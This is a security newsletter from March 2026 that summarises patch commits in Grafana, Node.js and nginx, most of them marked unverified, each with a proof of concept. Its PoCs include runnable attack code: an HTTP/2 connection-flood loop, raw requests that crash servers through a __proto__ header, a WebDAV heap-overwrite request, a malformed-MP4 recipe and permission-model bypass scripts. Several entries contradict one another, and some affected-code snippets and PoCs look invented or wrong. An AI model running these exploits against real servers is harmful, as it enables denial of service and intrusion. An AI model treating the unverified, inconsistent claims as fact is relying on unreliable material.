📰 Vulnerability Spoiler Alert


“Exposing patches before CVEs since 2025”

Friday, March 27, 2026

📋 Today’s Briefing

Total Findings: 121 · Confirmed: 11 · Unverified: 103 · False Positives: 7

CRITICAL: 2 · HIGH: 53 · MEDIUM: 56 · LOW: 3

🔥 HIGH UNVERIFIED Denial of Service (Resource Exhaustion)

Mar 27, 2026, 02:37 PM — grafana/grafana

Commit: 449a8a9

Author: Kevin Minehart Tenorio

The fill resampling feature in Grafana's SQL datasources (MySQL, PostgreSQL, MSSQL) could be exploited to cause excessive memory allocation. By crafting a query with a very large time range and a very small fill interval (e.g., time range spanning years with millisecond intervals), an attacker could trigger `sqlutil.ResampleWideFrame` to allocate an enormous number of data points, exhausting server memory and causing a denial of service. The patch adds a guard that skips the fill operation if the number of fill points would exceed the configured row limit.


Affected Code

frame, err = sqlutil.ResampleWideFrame(frame, qm.FillMissing, alignedTimeRange, qm.Interval)
if err != nil {
    logger.Error("Failed to resample dataframe", "err", err)
    frame.AppendNotices(data.Notice{Text: "Failed to resample dataframe", Severity: data.NoticeSeverityWarning})
}

Proof of Concept

Send a Grafana dashboard query to a PostgreSQL/MySQL/MSSQL datasource with timeRange.From = '2000-01-01T00:00:00Z' and timeRange.To = '2030-01-01T00:00:00Z' (a 30-year range), and a fill interval of '1ms' (1 millisecond). The macro $__timeGroup(time_column, '1ms', 0) enables fill mode with a 1 ms interval. numFillPoints = 30 years / 1 ms ≈ 9.46e11, so ResampleWideFrame would attempt to allocate roughly a trillion data points, consuming terabytes of memory and crashing the Grafana server.
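The arithmetic in the PoC can be sanity-checked with a short standalone script (illustrative only; the constants mirror the PoC, not Grafana's implementation):

```javascript
// Sanity check of the PoC arithmetic (illustrative; not Grafana code).
const MS_PER_YEAR = 365 * 24 * 3600 * 1000;
const rangeMs = 30 * MS_PER_YEAR; // ~30-year dashboard time range
const intervalMs = 1;             // 1 ms fill interval from $__timeGroup
const numFillPoints = rangeMs / intervalMs;
console.log(numFillPoints.toExponential(2)); // "9.46e+11"
```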

🔥 HIGH UNVERIFIED Sensitive Data Exposure

Mar 27, 2026, 08:15 AM — grafana/grafana

Commit: c23a34a

Author: Ryan McKinley

When a user creates a Kubernetes resource containing inline secure values (raw secrets) via kubectl apply, the kubectl client automatically stores the full object including the raw secret value in the `kubectl.kubernetes.io/last-applied-configuration` annotation. This annotation is persisted in the API server and can be read back by anyone with read access to the resource, effectively leaking the raw secret value. The patch clears this annotation when a raw secret is detected in the inline secure values section, preventing the secret from being stored in plaintext in the annotation.


Affected Code

n, err := store.CreateInline(ctx, v.ref, val.Create, val.Description)
if err != nil {
    return err
}
v.createdSecureValues = append(v.createdSecureValues, n)
v.hasChanged = true
secure[k] = common.InlineSecureValue{Name: n}
continue

Proof of Concept

1. User runs: kubectl apply -f datasource.yaml where datasource.yaml contains a secure value like {"secure": {"password": {"create": "SuperSecretPassword123"}}}
2. kubectl automatically adds annotation: kubectl.kubernetes.io/last-applied-configuration={..."secure":{"password":{"create":"SuperSecretPassword123"}}...}
3. Any user with read access to the resource can retrieve the raw secret: kubectl get datasource myds -o jsonpath='{.metadata.annotations.kubectl\.kubernetes\.io/last-applied-configuration}'
4. The raw secret value 'SuperSecretPassword123' is returned in plaintext, bypassing the entire secure value protection mechanism.

🔥 HIGH UNVERIFIED Use-After-Free

Mar 26, 2026, 10:18 PM — nodejs/node

Commit: 53bcd11

Author: Matteo Collina

The Reset() method in Node.js's zlib binding did not check the write_in_progress_ flag before resetting the compression stream. This allowed calling reset() while an async write was being processed by a worker thread, causing the internal zlib/brotli state to be freed while still in use, resulting in a use-after-free condition that could lead to memory corruption or process crash. The fix adds a guard that throws an error if a write is in progress, consistent with how Close() and Write() already behave.


Affected Code

AllocScope alloc_scope(wrap);
const CompressionError err = wrap->context()->ResetStream();
if (err.IsError())

Proof of Concept

const { createDeflate } = require('zlib');
const stream = createDeflate();
const input = Buffer.alloc(1024 * 1024, 0x41); // large buffer to ensure async
stream.write(input);
// Immediately reset while write is in progress in thread pool:
stream._handle.reset(); // triggers use-after-free in worker thread

⚠️ MEDIUM UNVERIFIED Broken Access Control / Authorization Bypass

Mar 26, 2026, 08:40 AM — grafana/grafana

Commit: bafbc26

Author: Gabriel MABILLE

Before this patch, the Kubernetes-style IAM API endpoint `/apis/iam.grafana.app/v0alpha1/namespaces/{ns}/users/{name}/teams` used the generic `ResourceAuthorizer` which only checked `get` permission on the `users` resource itself, but did not properly enforce the `teams` subresource authorization. According to the commit, the RBAC service would ignore the 'teams' subresource check, meaning any user with generic `users:read` permission could potentially access team membership data for users they shouldn't be able to see. The patch adds a dedicated `UserAuthorizer` that explicitly checks `get` permission on the parent user when the `teams` subresource is requested.


Affected Code

resourceAuthorizer[iamv0.UserResourceInfo.GetName()] = authorizer

Proof of Concept

An authenticated user with `users:read` permission scoped to a subset of users (e.g., only their own user) could send:

GET /apis/iam.grafana.app/v0alpha1/namespaces/org-1/users/another-user-id/teams

Before the patch, the ResourceAuthorizer checked permission on the `users` resource without handling the `teams` subresource distinction, potentially allowing access to team memberships of users outside the caller's permission scope. After the patch, a proper `get` check on the specific parent user is enforced before granting access to their teams.

⚠️ MEDIUM UNVERIFIED Broken Access Control / Information Disclosure

Mar 25, 2026, 03:52 PM — grafana/grafana

Commit: c30a9e2

Author: Yuri Tseretyan

The `/api/alertmanager/grafana/api/v2/status` endpoint was protected by the `alert.notifications:read` permission, which is granted to Viewers and Editors by default. This allowed any authenticated user (including low-privileged Viewers) to access Alertmanager system status information including routing configuration, receivers configuration, and other sensitive system details. The patch replaces this with a new dedicated `alert.notifications.system-status:read` permission that is only granted to Admin users.


Affected Code

case http.MethodGet + "/api/alertmanager/grafana/api/v2/status":
	eval = ac.EvalPermission(ac.ActionAlertingNotificationsRead)

Proof of Concept

curl -u viewer:viewer http://<grafana-host>/api/alertmanager/grafana/api/v2/status
# Before the patch, this returns HTTP 200 with full Alertmanager status including routing configuration and receiver details
# After the patch, returns HTTP 403 Forbidden for Viewer/Editor users

⚠️ MEDIUM UNVERIFIED Authorization Bypass / Improper Access Control

Mar 25, 2026, 02:31 PM — grafana/grafana

Commit: 2895856

Author: Gonzalo Trigueros Manzanas

Before the patch, the `validateWriteAccess` function did not handle `JobActionFixFolderMetadata` in its switch statement, meaning it fell through to the `default` case which applies no ref-based restriction. This allowed users to trigger a fix-folder-metadata job that would write directly to the default/main branch even when the repository was configured with only a 'branch' workflow (meaning the default branch should be read-only). The patch adds the missing case to extract the target ref from `FixFolderMetadata.Ref` and apply proper write permission checks.


Affected Code

case provisioning.JobActionPush:
    if spec.Push != nil {
        targetRef = spec.Push.Branch
    }
// Missing case for JobActionFixFolderMetadata - falls through to default
case provisioning.JobActionMigrate:

Proof of Concept

POST /apis/provisioning.grafana.app/v0alpha1/namespaces/default/repositories/my-read-only-repo/jobs
Content-Type: application/json

{"action": "fix-folder-metadata"}

This request would bypass the branch-workflow restriction and push _folder.json files directly to the protected main branch, even though the repo is configured with only the 'branch' workflow (no direct writes to default branch allowed).

🔥 HIGH UNVERIFIED Permission Model Bypass

Jan 5, 2026, 09:18 PM — nodejs/node

Commit: e4f3c20

Author: RafaelGSS

The Node.js Permission Model's `--allow-fs-read` restriction could be bypassed by using `fs.realpath.native()` instead of `fs.realpath()`. Before the patch, `RealPath` in node_file.cc lacked permission checks for both the async and sync code paths, allowing an attacker to read/resolve file paths that should be blocked by the permission model. The patch adds `ASYNC_THROW_IF_INSUFFICIENT_PERMISSIONS` and `THROW_IF_INSUFFICIENT_PERMISSIONS` checks to enforce the `kFileSystemRead` permission scope.


Affected Code

if (argc > 2) {  // realpath(path, encoding, req)
    FSReqBase* req_wrap_async = GetReqWrap(args, 2);
    CHECK_NOT_NULL(req_wrap_async);
    FS_ASYNC_TRACE_BEGIN1(
        UV_FS_REALPATH, req_wrap_async, "path", TRACE_STR_COPY(*path))

Proof of Concept

// Run Node.js with permission model restricting /etc/passwd:
// node --experimental-permission --allow-fs-read=/tmp script.js
// script.js:
const fs = require('fs');
// fs.readFile('/etc/passwd', ...) would throw ERR_ACCESS_DENIED
// But before patch, this would succeed and resolve the real path:
fs.realpath.native('/etc/passwd', (err, resolvedPath) => {
  console.log('Bypassed permission model, resolved path:', resolvedPath);
});

🔥 HIGH UNVERIFIED Permission Model Bypass

Jan 5, 2026, 11:36 PM — nodejs/node

Commit: 3a04e0f

Author: RafaelGSS

The Node.js Permission Model (introduced with --experimental-permission flag) did not enforce filesystem read/write permission checks on several `fs/promises` API functions including `lstat`, `fchmod`, and `fchown`. This allowed an attacker to bypass the permission model by using the promise-based filesystem API instead of the callback/sync APIs, which did have proper permission checks. The patch adds the missing permission checks to `lstat` (read permission) and disables `fchmod`/`fchown` entirely when the Permission Model is enabled.


Affected Code

async function lstat(path, options = { bigint: false }) {
  const result = await PromisePrototypeThen(
    binding.lstat(getValidatedPath(path), options.bigint, kUsePromises),
    undefined,
    handleErrorFromBinding,
  );

Proof of Concept

// Run Node.js with Permission Model enabled, blocking access to /etc/passwd:
// node --experimental-permission --allow-fs-read=/tmp test.js

const { lstat } = require('node:fs/promises');

// Before patch: this succeeds and reveals file metadata despite being blocked
// After patch: throws ERR_ACCESS_DENIED
async function exploit() {
  try {
    const stats = await lstat('/etc/passwd');
    console.log('BYPASS SUCCESS - got stats:', stats); // succeeds before patch
  } catch (e) {
    console.log('Blocked:', e.code);
  }
}
exploit();

// Similarly for fchmod to change file permissions on a blocked file:
// const fh = await open('/etc/somefile', 'r'); // if read is allowed
// await fh.chmod(0o777); // Before patch: succeeds, bypassing write permission check

🔥 HIGH UNVERIFIED Denial of Service (Crash/Abort)

Feb 10, 2026, 01:23 PM — nodejs/node

Commit: dabb2f5

Author: RafaelGSS

Before the patch, `url.format()` called `CHECK(out)` after attempting to re-parse a URL string with `ada::parse<ada::url>`. If the URL (originally parsed by `ada::url_aggregator`) could not be re-parsed by `ada::url` (e.g., special scheme URLs with opaque paths like `ws:xn-ȫ`), the CHECK macro would trigger an abort/crash of the Node.js process. The patch replaces the hard crash with a graceful fallback that returns the original href unmodified.


Affected Code

auto out = ada::parse<ada::url>(href.ToStringView());
CHECK(out);

Proof of Concept

// Run in Node.js - crashes the process before the patch
const url = require('node:url');
const u = new URL('ws:xn-\u022B');
url.format(u, { fragment: false, unicode: false, auth: false, search: false });
// Before patch: process aborts with CHECK failure
// After patch: returns the original href string without crashing

🔥 HIGH UNVERIFIED Uncaught Exception / Denial of Service

Feb 17, 2026, 01:26 PM — nodejs/node

Commit: 2e2abc6

Author: Matteo Collina

Before the patch, if an SNICallback function threw a synchronous exception during TLS handshake processing in loadSNI(), the exception propagated as an uncaught exception and crashed the Node.js process. The patch wraps the owner._SNICallback() invocation in a try/catch block, routing any thrown exception through owner.destroy() instead. A remote, unauthenticated attacker could crash any Node.js TLS server whose SNICallback can throw synchronously by sending a TLS ClientHello with a crafted server_name value.


Affected Code

owner._SNICallback(servername, (err, context) => {
    if (once)
      return owner.destroy(new ERR_MULTIPLE_CALLBACK());
    once = true;
    if (err)
      return owner.destroy(err);

Proof of Concept

// Attacker code: connect to a Node.js TLS server with a crafted servername
// Server setup (victim):
const fs = require('fs');
const tls = require('tls');
const server = tls.createServer({
  key: fs.readFileSync('server-key.pem'),
  cert: fs.readFileSync('server-cert.pem'),
  SNICallback: (servername, cb) => {
    // knownHosts and getContext are app-specific; any synchronous throw
    // here crashes the server process before the patch
    if (!knownHosts[servername]) throw new Error('Unknown host');
    cb(null, getContext(servername));
  }
});
server.listen(443);

// Attacker: send TLS ClientHello with servername='evil.attacker.com'
// This triggers SNICallback to throw, causing uncaught exception and process crash
const client = tls.connect({ host: 'victim.com', port: 443, servername: 'evil.attacker.com', rejectUnauthorized: false });
client.on('error', () => {});
// Result: Server process crashes with uncaught Error: Unknown host
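Until a server can be upgraded, one hedged defensive pattern is to guarantee the SNICallback itself never throws synchronously and instead reports failures through the callback, so the TLS layer rejects the handshake rather than the process crashing. `safeSNICallback` and `lookup` below are illustrative names, not Node.js APIs:

```javascript
// Wrap an app-specific, possibly-throwing context lookup so errors are
// routed through the callback instead of escaping as uncaught exceptions.
function safeSNICallback(lookup) {
  return (servername, cb) => {
    let ctx;
    try {
      ctx = lookup(servername); // may throw for unknown hosts
    } catch (err) {
      return cb(err);           // handshake fails cleanly for this client
    }
    cb(null, ctx);
  };
}
```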

⚠️ MEDIUM UNVERIFIED Permission Model Bypass

Feb 18, 2026, 04:37 PM — nodejs/node

Commit: 59c86b1

Author: RafaelGSS

Node.js's permission model (--permission flag) failed to enforce network access controls for Unix Domain Socket (UDS) connections and server listeners via pipe_wrap.cc. Before the patch, calling net.createServer().listen('/tmp/sock') or net.connect({path:'/tmp/sock'}) would succeed even when --allow-net was not granted, bypassing the intended permission restrictions. The patch adds THROW_IF_INSUFFICIENT_PERMISSIONS checks to PipeWrap::Bind and PipeWrap::Listen to enforce the kNet permission scope.


Affected Code

void PipeWrap::Bind(const FunctionCallbackInfo<Value>& args) {
  PipeWrap* wrap;
  ASSIGN_OR_RETURN_UNWRAP(&wrap, args.This());
  node::Utf8Value name(args.GetIsolate(), args[0]);
  int err =
      uv_pipe_bind2(&wrap->handle_, *name, name.length(), UV_PIPE_NO_TRUNCATE);

Proof of Concept

// Run with: node --permission --allow-fs-read=* exploit.js
// Before patch: server binds successfully despite no --allow-net
const net = require('net');
net.createServer().listen('/tmp/bypass.sock', () => {
  console.log('Permission bypass! Server listening on UDS without --allow-net');
});
// Expected after patch: throws ERR_ACCESS_DENIED with permission: 'Net'

🔥 HIGH UNVERIFIED Denial of Service via Prototype Pollution

Feb 19, 2026, 02:49 PM — nodejs/node

Commit: ef5929b

Author: Matteo Collina

When `headersDistinct` or `trailersDistinct` was accessed on an IncomingMessage, the destination object was initialized as a plain `{}` which inherits from `Object.prototype`. If a request included a `__proto__` header, `dst["__proto__"]` would resolve to `Object.prototype` (a truthy object rather than undefined), causing `_addHeaderLineDistinct` to call `.push()` on `Object.prototype` instead of an array, throwing an uncaught TypeError that crashes the Node.js process. The fix uses `{ __proto__: null }` to create a null-prototype object, preventing prototype chain lookups.


Affected Code

if (!this[kHeadersDistinct]) {
  this[kHeadersDistinct] = {};

  const src = this.rawHeaders;
  const dst = this[kHeadersDistinct];

Proof of Concept

Send the following raw HTTP request to any Node.js HTTP server that accesses req.headersDistinct:

```
GET / HTTP/1.1\r\n
Host: localhost\r\n
__proto__: test\r\n
Connection: close\r\n
\r\n
```

Or programmatically:
```javascript
const net = require('net');
const client = net.connect(PORT, () => {
  client.write('GET / HTTP/1.1\r\nHost: localhost\r\n__proto__: test\r\nConnection: close\r\n\r\n');
});
// Server crashes with: TypeError: dest[key].push is not a function
// because dest["__proto__"] resolves to Object.prototype (truthy),
// so push() is called on Object.prototype instead of an array.
```
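The root cause can be reproduced standalone: on a plain object, a lookup of the string `"__proto__"` returns Object.prototype (truthy), while the null-prototype object the fix switches to returns undefined:

```javascript
// Plain object: "__proto__" hits the inherited accessor and returns the
// object's prototype, i.e. Object.prototype, a truthy value.
const plain = {};
console.log(plain['__proto__'] === Object.prototype); // true

// Null-prototype object (the fix): no prototype chain, so the lookup is a
// plain missing-property access and returns undefined.
const fixed = { __proto__: null };
console.log(fixed['__proto__']); // undefined
```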

⚠️ MEDIUM UNVERIFIED Timing Side-Channel Attack (HMAC/KMAC Verification)

Feb 20, 2026, 11:32 AM — nodejs/node

Commit: b36d5a3

Author: Filip Skokan

The Web Cryptography API's HMAC and KMAC `verify` operations used the non-constant-time `memcmp` function to compare the computed MAC against the provided signature. This allowed timing-based side-channel attacks where an attacker could measure response times to infer byte-by-byte information about the expected MAC value. The patch replaces `memcmp` with `CRYPTO_memcmp`, which executes in constant time regardless of where the comparison fails.


Affected Code

out->size() > 0 && out->size() == params.signature.size() &&
    memcmp(out->data(), params.signature.data(), out->size()) == 0

Proof of Concept

// Exploit: Timing attack against SubtleCrypto.verify() for HMAC
// An attacker who can make many verify calls and measure timing can recover the HMAC value

async function timingAttack() {
  const key = await crypto.subtle.importKey(
    'raw', new TextEncoder().encode('secret-key'),
    { name: 'HMAC', hash: 'SHA-256' }, false, ['sign', 'verify']
  );
  const data = new TextEncoder().encode('message');
  // Attacker tries forged signatures byte by byte
  // memcmp returns early on first differing byte, leaking timing info
  // A signature where first byte matches will take slightly longer than one where first byte differs
  const forgedSig = new Uint8Array(32); // all zeros
  const ITERATIONS = 100000;
  const start = performance.now();
  for (let i = 0; i < ITERATIONS; i++) {
    await crypto.subtle.verify('HMAC', key, forgedSig, data);
  }
  const elapsed = performance.now() - start;
  // By varying forgedSig[0] from 0-255 and measuring timing, attacker
  // can determine correct first byte (takes measurably longer when correct)
  // Repeat for each subsequent byte to recover full HMAC
  console.log('Timing:', elapsed);
}

🔥 HIGH UNVERIFIED Memory Leak / Resource Exhaustion (DoS)

Mar 11, 2026, 02:22 PM — nodejs/node

Commit: 8261536

Author: RafaelGSS

A malicious HTTP/2 client could send a WINDOW_UPDATE frame on stream 0 (connection level) with an increment that pushes the flow-control window past 2^31-1. nghttp2 internally responds with GOAWAY(FLOW_CONTROL_ERROR) but Node.js's OnInvalidFrame callback did not handle NGHTTP2_ERR_FLOW_CONTROL, so the Http2Session was never destroyed, causing a memory leak. An attacker can exploit this to exhaust server memory by repeatedly opening connections and sending the malicious frame, enabling denial of service.


Affected Code

if (nghttp2_is_fatal(lib_error_code) ||
      lib_error_code == NGHTTP2_ERR_STREAM_CLOSED ||
      lib_error_code == NGHTTP2_ERR_PROTO) {

Proof of Concept

// Connect via raw TCP to a Node.js HTTP/2 server and send:
// 1. HTTP/2 client preface: 'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'
// 2. Empty SETTINGS frame
// 3. After receiving server SETTINGS, send SETTINGS ACK
// 4. Send WINDOW_UPDATE on stream 0 with increment 0x7FFFFFFF (2^31-1)
//    Default window is 65535, so 65535+2147483647 > 2^31-1 triggers NGHTTP2_ERR_FLOW_CONTROL
// The server sends GOAWAY but the Http2Session is never destroyed -> memory leak
// Repeat thousands of times to exhaust server memory.

const net = require('net');
for (let i = 0; i < 10000; i++) {
  const conn = net.connect({ port: 8443 });
  conn.write('PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n');
  const settings = Buffer.alloc(9); settings[3] = 0x04; conn.write(settings);
  setTimeout(() => {
    const ack = Buffer.alloc(9); ack[3] = 0x04; ack[4] = 0x01; conn.write(ack);
    const wu = Buffer.alloc(13);
    wu.writeUIntBE(4,0,3); wu[3]=0x08; wu[4]=0x00;
    wu.writeUIntBE(0,5,4); wu.writeUIntBE(0x7FFFFFFF,9,4);
    conn.write(wu);
  }, 100);
}

🔥 HIGH UNVERIFIED Hash Collision / Denial of Service

Jan 29, 2026, 02:30 AM — nodejs/node

Commit: 0d7e4b1

Author: Joyee Cheung

V8's array index hash values for numeric strings were predictable because they directly encoded the integer value and string length without randomization. Consecutive numeric string keys (e.g., '0', '1', '2', ...) would have consecutive hash values, allowing an attacker to craft inputs that cause O(n^2) hash table probe collisions. This patch adds seeded scrambling of the 24-bit array-index value in Name's raw_hash_field using a 3-round xorshift-multiply scheme with random secrets derived from rapidhash, preventing an attacker from predicting hash distributions. This is tracked as CVE-2026-21717.


Affected Code

// Previously, array index hashes were simply:
// MakeArrayIndexHash(value, length) encodes value directly
// Name::ArrayIndexValueBits::decode(raw_hash_field_) to recover
// Consecutive keys '0','1','2'... had consecutive, predictable hash values

Proof of Concept

// Node.js DoS via hash collision attack
const obj = {};
const N = 100000;
const start = Date.now();
// Insert consecutive numeric string keys - before the patch, these have
// consecutive hash values causing O(n^2) worst-case probing behavior
for (let i = 0; i < N; i++) {
  obj[String(i)] = i;
}
console.log('Time:', Date.now() - start, 'ms');
// An attacker serving a JSON payload with sequential numeric keys to a
// Node.js server causes excessive CPU usage. With predictable hashes,
// crafted inputs can force worst-case hash table behavior, leading to DoS.

🔥 HIGH UNVERIFIED Multiple: Timing Attack, Prototype Pollution, Permission Bypass, DoS, TLS Error Handling

Mar 19, 2026, 12:29 PM — nodejs/node

Commit: 7be0e28

Author: Marco Ippolito

This commit patches multiple security vulnerabilities in Node.js 20.x LTS including: (1) CVE-2026-21713: timing-unsafe HMAC comparison in Web Crypto allowing key extraction via timing oracle; (2) CVE-2026-21710: missing null prototype for HTTP headers objects enabling prototype pollution; (3) CVE-2026-21716/21715: missing permission checks in fs.promises and realpath.native bypassing Node.js permission model; (4) CVE-2026-21714: unhandled NGHTTP2_ERR_FLOW_CONTROL causing HTTP/2 DoS; (5) CVE-2026-21637: uncaught SNICallback exception crashing TLS server.


Affected Code

// CVE-2026-21710: HTTP headers without null prototype
this.headersDistinct = {}; // vulnerable to __proto__ pollution
this.trailersDistinct = {};

// CVE-2026-21713: Non-timing-safe HMAC comparison
return mac === signature; // allows timing oracle attack

Proof of Concept

// CVE-2026-21710 Prototype Pollution via HTTP headers:
const http = require('http');
http.get('http://victim/', (res) => {
  // Before patch, headersDistinct used regular {} allowing:
  // __proto__ key in response headers to pollute Object.prototype
});

// CVE-2026-21637 TLS Server Crash:
const tls = require('tls');
const server = tls.createServer({
  SNICallback: (servername, cb) => { throw new Error('crash'); }
});
// Before patch, uncaught exception from SNICallback crashes entire server process

// CVE-2026-21713 Timing attack on HMAC:
// Attacker can measure response time differences to brute-force HMAC signatures
// by exploiting non-constant-time string comparison in Web Crypto HMAC verify

🔥 HIGH UNVERIFIED Multiple: Prototype Pollution, Timing Side-Channel, DoS, Permission Bypass, Hash Collision

Mar 22, 2026, 04:06 PM — nodejs/node

Commit: d2be89c

Author: Antoine du Hamel

This commit patches multiple CVEs in Node.js 22 LTS. The highest severity issues include CVE-2026-21710 (prototype pollution via HTTP headers, fixed by switching headersDistinct/trailersDistinct to null-prototype objects) and CVE-2026-21637 (uncaught exception DoS via SNICallback). The patch also fixes a timing side-channel in HMAC comparison (CVE-2026-21713), permission bypass in fs.promises and realpath.native (CVE-2026-21715/16), HTTP/2 flow control error handling (CVE-2026-21714), and a V8 array index hash collision (CVE-2026-21717).


Affected Code

// HTTP headers object used regular Object prototype, allowing prototype pollution:
// headersDistinct/trailersDistinct were created as plain objects {}
// allowing '__proto__', 'constructor', 'toString' as header names to pollute Object.prototype

Proof of Concept

// CVE-2026-21710: Prototype Pollution via HTTP headers
const http = require('http');
const req = http.request({host:'example.com'}, (res) => {
  // Before patch: res.headersDistinct used Object with prototype
  // Sending header '__proto__' would pollute Object.prototype
  console.log(res.headersDistinct['__proto__']); // could access prototype chain
});
req.setHeader('__proto__', 'polluted');

// CVE-2026-21637: SNICallback exception causes server crash
const tls = require('tls');
const server = tls.createServer({
  SNICallback: (servername, cb) => { throw new Error('crash'); }
});
// Before patch: uncaught exception in SNICallback would crash the Node.js process

🔥 HIGH UNVERIFIED Prototype Pollution

Mar 16, 2026, 05:02 PM — nodejs/node

Commit: 141d9f1

Author: Juan José Arboleda

The HTTP module used regular objects for headersDistinct and trailersDistinct, which are populated with header names as keys. An attacker could send HTTP headers with names like '__proto__', 'constructor', or 'toString' to pollute the Object prototype, potentially affecting all objects in the Node.js process. The fix uses null-prototype objects (Object.create(null)) to prevent prototype chain pollution.


Affected Code

headersDistinct[key] = [value]; // key could be '__proto__' or 'constructor'
trailersDistinct[key] = [value]; // using regular object allows prototype pollution

Proof of Concept

// Send HTTP request with prototype-polluting header name:
const http = require('http');
const req = http.request({host:'target.com', path:'/', method:'GET'}, (res) => {
  console.log(res.headersDistinct['__proto__']); // triggers prototype pollution
});
req.setHeader('__proto__', '{"polluted":true}');
req.end();
// After processing, check: console.log({}.polluted) // => true (before patch)

🔥 HIGH UNVERIFIED Prototype Pollution

Mar 20, 2026, 05:29 PM — nodejs/node

Commit: d88a46a

Author: RafaelGSS

The HTTP module used regular objects (with Object.prototype) for headersDistinct and trailersDistinct, which could allow an attacker to pollute the prototype chain by sending HTTP headers with names like '__proto__' or 'constructor'. The fix uses null-prototype objects (Object.create(null)) to prevent prototype pollution attacks. This could lead to security bypasses or unexpected behavior in applications that rely on HTTP header processing.


Affected Code

headersDistinct: {}, // or similar object literal without null prototype
trailersDistinct: {} // inherits from Object.prototype

Proof of Concept

// Send an HTTP request with a header named '__proto__' or 'constructor':
// curl -H '__proto__: {"polluted":true}' http://target-server/
// Or in Node.js:
const http = require('http');
const req = http.request({host:'localhost', port:3000, headers: {'__proto__': 'polluted'}});
// Before patch: headersDistinct['__proto__'] assignment could pollute Object.prototype
// After parsing headers, Object.prototype.polluted could be set to unexpected values
// affecting all objects in the process

🔥 HIGH UNVERIFIED Authentication Bypass

Mar 17, 2026, 03:20 PM — nginx/nginx

Commit: 18711f7

Author: Sergey Kandaurov

In the nginx stream SSL module, the OCSP (Online Certificate Status Protocol) certificate revocation check was not being performed during client certificate validation. The code would verify the certificate chain but skip the OCSP status check, allowing clients with revoked certificates to successfully authenticate. The patch adds the missing `ngx_ssl_ocsp_get_status()` call that properly checks and enforces OCSP certificate revocation status.


Affected Code

X509_free(cert);
        }
    }

    return NGX_OK;

Proof of Concept

1. Configure nginx stream with ssl_verify_client on and ssl_ocsp on
2. Obtain a valid client certificate from a CA that supports OCSP
3. Have the CA revoke the certificate (OCSP status becomes 'revoked')
4. Connect to nginx stream using the revoked certificate:
   openssl s_client -connect nginx-server:port -cert revoked-client.crt -key client.key
5. BEFORE patch: Connection succeeds despite revoked certificate (OCSP check was skipped)
6. AFTER patch: Connection is rejected with 'client SSL certificate verify error'

🔥 HIGH UNVERIFIED Integer Overflow leading to Out-of-Bounds Read/Write

Mar 2, 2026, 05:12 PM — nginx/nginx

Commit: 3568812

Author: Roman Arutyunyan

On 32-bit platforms, multiplying a uint32_t `entries` value by the size of a struct (also size_t/32-bit) could overflow before being compared to the uint64_t `atom_data_size`. This allowed an attacker to craft a malicious MP4 file with a large entries count that, after overflow, appeared to pass the size validation check, causing nginx to process entries beyond the allocated buffer boundaries with out-of-bounds reads and writes. The fix casts `entries` to uint64_t before multiplication to prevent the overflow.


Affected Code

if (ngx_mp4_atom_data_size(ngx_mp4_stts_atom_t)
        + entries * sizeof(ngx_mp4_stts_entry_t) > atom_data_size)

Proof of Concept

Craft a malicious MP4 file whose stts atom has entries=0x20000000 (536,870,912) and a small atom_data_size=0x100. On a 32-bit platform:

1. entries * sizeof(ngx_mp4_stts_entry_t) = 0x20000000 * 8 = 0x100000000, which overflows to 0x00000000.
2. Adding ngx_mp4_atom_data_size (e.g., 12) gives 12, which is less than atom_data_size=0x100, so validation passes.
3. nginx then processes 536 million non-existent entries beyond the allocated buffer, causing heap out-of-bounds access.

Serve this file via nginx's mp4 module: GET /malicious.mp4?start=0
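The wraparound can be reproduced in a few lines, using JavaScript's uint32 coercion in place of 32-bit C arithmetic (an illustration of the arithmetic only, not nginx code):

```javascript
const entries = 0x20000000;  // 536,870,912 stts entries from the crafted atom
const entrySize = 8;         // sizeof(ngx_mp4_stts_entry_t)
const atomHeader = 12;       // ngx_mp4_atom_data_size(ngx_mp4_stts_atom_t)
const atomDataSize = 0x100;  // small atom_data_size from the crafted file

// Vulnerable 32-bit check: 0x20000000 * 8 = 0x100000000 wraps to 0,
// so the oversized atom slips past the validation.
const product32 = (entries * entrySize) >>> 0;
console.log(product32, atomHeader + product32 > atomDataSize); // 0 false

// The fix: widen to 64 bits before multiplying, so validation rejects it.
const product64 = BigInt(entries) * BigInt(entrySize);
console.log(BigInt(atomHeader) + product64 > BigInt(atomDataSize)); // true
```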

🔥 HIGH UNVERIFIED Heap Buffer Overflow

Mar 16, 2026, 04:13 PM — nginx/nginx

Commit: 9739e75

Author: Roman Arutyunyan

When nginx WebDAV module (ngx_http_dav_module) processed COPY or MOVE requests with an alias directive configured, supplying a Destination header with a URI shorter than the alias prefix caused an integer underflow in ngx_http_map_uri_to_path(). The underflow resulted in a heap buffer overwrite, which could allow an attacker to manipulate source or destination file paths to be outside the configured location root (path traversal via memory corruption). The patch adds a validation check that rejects Destination URIs shorter than the alias length before the vulnerable path mapping occurs.


Affected Code

/* In ngx_http_dav_copy_move_handler(), before calling ngx_http_map_uri_to_path()
   with duri (destination URI), there was no check that duri.len >= clcf->alias.
   When alias is set and duri.len < clcf->alias, the subtraction
   (duri.len - clcf->alias) underflows as a size_t (unsigned), producing a
   huge length value passed to ngx_http_map_uri_to_path(). */

Proof of Concept

nginx.conf:
  location /files/ {
    alias /var/www/data/;
    dav_methods COPY MOVE;
  }

Exploit request:
  COPY /files/a.txt HTTP/1.1
  Host: victim.example.com
  Destination: http://victim.example.com/x
  Depth: 0

Here the Destination URI path '/x' has length 2, which is less than the alias
prefix length for '/files/' (7). This triggers the integer underflow in
ngx_http_map_uri_to_path() when computing the path length, resulting in a heap
buffer overwrite that can change the resolved destination path to be outside
/var/www/data/, potentially writing to arbitrary filesystem locations.
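The underflow itself can be modeled in a couple of lines of Python (assuming a 64-bit size_t; field names mirror the nginx code):

```python
# size_t is unsigned: duri.len - clcf->alias wraps to a huge value
# when the Destination URI is shorter than the alias prefix.
SIZE_MAX = 2**64 - 1  # assuming a 64-bit size_t

duri_len = len("/x")        # 2
alias_len = len("/files/")  # 7

path_len = (duri_len - alias_len) & SIZE_MAX
assert path_len == SIZE_MAX - 4   # 0xFFFFFFFFFFFFFFFB, an absurd length

# The patch rejects the request before the subtraction can underflow:
def destination_ok(duri_len, alias_len):
    return duri_len >= alias_len

assert not destination_ok(duri_len, alias_len)
```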

🔥 HIGH UNVERIFIED Header Injection / SMTP Injection

Feb 26, 2026, 07:52 AM — nginx/nginx

Commit: 6f31450

Author: Roman Arutyunyan

